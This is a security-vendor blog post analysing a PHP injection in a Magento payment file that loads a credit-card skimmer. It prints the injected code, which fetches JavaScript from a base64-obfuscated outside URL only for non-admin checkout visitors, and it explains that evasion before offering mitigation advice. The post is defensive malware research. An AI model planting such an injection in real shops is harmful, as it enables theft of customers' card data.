• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Magento PHP Injection Loads JavaScript Skimmer

January 21, 2021Luke Leal

FacebookTwitterSubscribe

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php

...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
              if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
                  if(!isset($_COOKIE["adminhtml"])){
                      echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
                  }
              }
          }

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

As an additional layer of evasive maneuvering, the skimmer only loads when two conditions are met: if the visitor is on the checkout page and if the visitor is not logged into the Magento website as an admin user.

The PHP code checks for these conditions by looking in the visitor’s requested URI for the text string “/onestepcheckout/index/” with strpos. It also checks to see if the visitor has a adminhtml cookie, which would indicate if the visitor is logged into the Magento website as an admin user.

Magento PHP Injection

Credit card skimmers are an ongoing issue for ecommerce websites. Not only do they have serious implications for your websites, but they also put customers at risk of identity theft or credit card fraud — which can ultimately lead to PCI compliance issues.

And while bad actors are constantly updating their malware with new techniques and evasive maneuvers, there are a number of steps ecommerce sites can take to protect their users and revenue streams.

To mitigate risk and prevent infection, install the latest security patches as soon as they become available, follow website hardening guidelines, and leverage a web application firewall to virtually patch any known vulnerabilities.

FacebookTwitterSubscribe

Categories: Ecommerce Security, Sucuri, Sucuri Labs, Website SecurityTags: Black Hat Tactics, Labs Note, Malware, Obfuscation

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.